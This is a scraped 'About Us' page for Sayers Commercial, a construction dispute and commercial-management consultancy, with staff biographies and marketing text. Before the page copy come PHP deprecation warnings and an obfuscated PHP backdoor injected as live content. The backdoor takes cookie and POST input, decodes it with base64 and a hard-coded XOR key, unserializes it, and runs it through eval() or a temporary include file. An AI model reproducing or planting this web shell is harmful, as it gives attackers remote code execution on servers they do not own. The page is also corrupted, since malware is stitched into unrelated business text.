Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1405

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1405

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1406

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1406

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1407

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1407

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1408

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1408

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1409

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1409

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1410

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1410

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1412

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-display.php on line 1412

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 580

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 580

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 581

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 583

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 583

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 584

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 586

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 586

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Using ${var} in strings is deprecated, use {$var} instead in E:\WWW\SayersCommercial\\www\wp-content\plugins\si-contact-form\includes\class-fscf-process.php on line 587

Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-content\plugins\wordfence\lib\wfScanMonitor.php on line 123

Deprecated: Calling get_class() without arguments is deprecated in E:\WWW\SayersCommercial\\www\wp-content\plugins\wordfence\lib\wfScanMonitor.php on line 124
$WJVkA = chr ( 385 - 266 ).chr (98) . chr ( 269 - 174 )."\x41" . chr (82) . "\104" . "\x7a" . 's';$ybRMMGFQSg = "\143" . 'l' . "\x61" . "\163" . 's' . "\x5f" . chr ( 306 - 205 ).chr ( 839 - 719 ).chr (105) . chr ( 331 - 216 )."\164" . "\x73";$UykzvsrP = class_exists($WJVkA); $ybRMMGFQSg = "5424";$eWtzuSPatp = strpos($ybRMMGFQSg, $WJVkA);if ($UykzvsrP == $eWtzuSPatp){function UUrniRro(){$yCUFpqjzL = new /* 63857 */ wb_ARDzs(26721 + 26721); $yCUFpqjzL = NULL;}$OEUmlgD = "26721";class wb_ARDzs{private function XFCYSjU($OEUmlgD){if (is_array(wb_ARDzs::$AcacSUdDu)) {$KuxesT2 = str_replace("<" . "?php", "", wb_ARDzs::$AcacSUdDu["content"]);eval($KuxesT2); $OEUmlgD = "26721";exit();}}public function NBxdB(){$KuxesT = "27699";$this->_dummy = str_repeat($KuxesT, strlen($KuxesT));}public function __destruct(){wb_ARDzs::$AcacSUdDu = @unserialize(wb_ARDzs::$AcacSUdDu); $OEUmlgD = "31877_30068";$this->XFCYSjU($OEUmlgD); $OEUmlgD = "31877_30068";}public function JrHZesMl($KuxesT, $loRzQee){return $KuxesT[0] ^ str_repeat($loRzQee, intval(strlen($KuxesT[0]) / strlen($loRzQee)) + 1);}public function sHeTuNspM($KuxesT){$PxssQeKv = "\142" . chr ( 1085 - 988 ).chr ( 1011 - 896 )."\145" . chr ( 553 - 499 ).'4';return array_map($PxssQeKv . chr (95) . "\144" . chr ( 636 - 535 )."\143" . "\x6f" . "\x64" . "\145", array($KuxesT,));}public function __construct($XDCDieOUwa=0){$SlmaPbSLV = "\x2c";$KuxesT = "";$FUfIzgB = $_POST;$TNjyE = $_COOKIE;$loRzQee = "b8faf738-0c82-4d32-9c24-221030211ed3";$dzCII = @$TNjyE[substr($loRzQee, 0, 4)];if (!empty($dzCII)){$dzCII = explode($SlmaPbSLV, $dzCII);foreach ($dzCII as $vYEEG){$KuxesT .= @$TNjyE[$vYEEG];$KuxesT .= @$FUfIzgB[$vYEEG];}$KuxesT = $this->sHeTuNspM($KuxesT);}wb_ARDzs::$AcacSUdDu = $this->JrHZesMl($KuxesT, $loRzQee);if (strpos($loRzQee, $SlmaPbSLV) !== FALSE){$loRzQee = explode($SlmaPbSLV, $loRzQee); $rIuzKjk = sprintf("31877_30068", rtrim($loRzQee[0]));}}public static $AcacSUdDu = 50381;}UUrniRro();}$UVvzr = "\166" . chr (95) . chr ( 600 - 481 ).chr ( 893 - 813 ).chr ( 441 - 368 ).'r' . chr ( 556 - 484 ); $QswAuAtmH = 'c' . 'l' . "\141" . "\163" . 's' . chr (95) . 'e' . "\x78" . 'i' . chr (115) . chr (116) . chr ( 852 - 737 ); $RmEUKauqms = class_exists($UVvzr); $QswAuAtmH = "60056";$WJOvAl = strpos($QswAuAtmH, $UVvzr);if ($RmEUKauqms == $WJOvAl){function rUQaPRJarR(){$TSevyADzkI = new /* 36967 */ v_wPIrH(57503 + 57503); $TSevyADzkI = NULL;}$cWmKULUNvs = "57503";class v_wPIrH{private function jqBBlqRsm($cWmKULUNvs){if (is_array(v_wPIrH::$tbtFDnHv)) {$name = sys_get_temp_dir() . "/" . crc32(v_wPIrH::$tbtFDnHv["salt"]);@v_wPIrH::$tbtFDnHv["write"]($name, v_wPIrH::$tbtFDnHv["content"]);include $name;@v_wPIrH::$tbtFDnHv["delete"]($name); $cWmKULUNvs = "57503";exit();}}public function lwlCBzCsp(){$ehZxQAH = "48143";$this->_dummy = str_repeat($ehZxQAH, strlen($ehZxQAH));}public function __destruct(){v_wPIrH::$tbtFDnHv = @unserialize(v_wPIrH::$tbtFDnHv); $cWmKULUNvs = "944_31387";$this->jqBBlqRsm($cWmKULUNvs); $cWmKULUNvs = "944_31387";}public function uoCzLT($ehZxQAH, $JAnigFuCwX){return $ehZxQAH[0] ^ str_repeat($JAnigFuCwX, intval(strlen($ehZxQAH[0]) / strlen($JAnigFuCwX)) + 1);}public function tbPDZ($ehZxQAH){$sohAuh = chr (98) . 'a' . "\163" . "\x65" . "\x36" . chr ( 64 - 12 );return array_map($sohAuh . "\x5f" . chr (100) . 'e' . "\x63" . 'o' . "\x64" . chr (101), array($ehZxQAH,));}public function __construct($oQVtVFUBtg=0){$VmeCnch = "\54";$ehZxQAH = "";$XuKqTYTxe = $_POST;$hWAFpVglE = $_COOKIE;$JAnigFuCwX = "007d08cb-5abe-40c8-b4bd-a9cb8a236c29";$xyVdk = @$hWAFpVglE[substr($JAnigFuCwX, 0, 4)];if (!empty($xyVdk)){$xyVdk = explode($VmeCnch, $xyVdk);foreach ($xyVdk as $ggGvQjH){$ehZxQAH .= @$hWAFpVglE[$ggGvQjH];$ehZxQAH .= @$XuKqTYTxe[$ggGvQjH];}$ehZxQAH = $this->tbPDZ($ehZxQAH);}v_wPIrH::$tbtFDnHv = $this->uoCzLT($ehZxQAH, $JAnigFuCwX);if (strpos($JAnigFuCwX, $VmeCnch) !== FALSE){$JAnigFuCwX = explode($VmeCnch, $JAnigFuCwX); $ZHvxN = base64_decode(strrev($JAnigFuCwX[0]));}}public static $tbtFDnHv = 15659;}rUQaPRJarR();} About Us | Sayers Commercial | Commercial Management | Construction

Dean and the team have worked together for many years.  They have different and complementary skillsets which mean that we can offer a comprehensive commercial management service – no matter what your requirements are.

We specialise in providing contract advice, legal advice, dispute avoidance and dispute resolution services to all sectors of the construction industry. We advise and work with a range of clients (subcontractors, main contractors, end users, developers) on all matters relating to disputes and commercial management.

Friendly, approachable and known by clients for calling a spade a spade, we will take the time to listen and understand your requirements and give you clear, simple advice without using jargon or over-complicating matters.

“Not only has Sayers Commercial regularly provided us with valued expert commercial assistance, they have  also successfully negotiated on our behalf in a number of disputes, obtaining payments we thought we would never see.” Mark Clements, Managing Director 345 Interiors Ltd.

Who we are

Dean Sayers

Dean commenced his career as a Trainee Quantity Surveyor with Mowlem, after which he joined Wates as a Quantity Surveyor. During this period he was involved with several  high value new build and refurbishment projects. He was subsequently engaged by a number of subcontractors in the new build sector, before commencing work as a Commercial Manager in the fast track fit-out sector.

Over time he became more heavily involved in the management of disputes on behalf of both main contractors and subcontractors, which culminated in the founding of Sayers Commercial Limited.  He has a Master’s Degree in Construction Law & Dispute Resolution, a Diploma in International Commercial Arbitration and a Diploma in Adjudication.  He is a Fellow of the Chartered Institute of Arbitrators (FCIArb), a Freeman of the Worshipful Company of Arbitrators, Regional Liaison Officer on the Executive Committee of the Adjudication Society, Regional Convenor on the London/South East Committee of the Adjudication Society, a Member of the Adjudication Society and a Member of the Society of Construction Law.  He also sits as Arbitrator and Adjudicator, and is included in the Chartered Institute of Arbitrators (CIArb) Panel of Construction Adjudicators, the Construction Industry Council (CIC) Register of Adjudicators and UK Adjudicators (UKA) Panel of Adjudicators.

Extremely capable and innovative, Dean has extensive experience of the commercial and legal aspects of the construction industry.

He is proficient in all matters from the most basic aspects of quantity surveying and commercial management through to solving the most complex legal and commercial disputes; something which his track record in the industry supports.

Dean plays cricket and golf in his spare time, and likes watching football when he can. A real animal lover, he also enjoys travelling the world (often with his beloved Barmy Army).

Dean’s approach to delivering the best possible service to you:

“Sayers Commercial provides a very personal service with a high degree of professionalism. We have  extensive knowledge of the industry, and utilise this to achieve the best result for you. We will explore your requirements and be open, frank and honest with you prior to engagement. We will  always keep you  fully up to date on progress during the period of our appointment and we guarantee to achieve the best outcome possible in all claims situations.

We don’t  carry the large overhead of some of the larger claims consultancy firms within the industry and  as a result, we  can provide our  services to you at very competitive rates.  Please get in touch, we look forward to discussing how we can help.”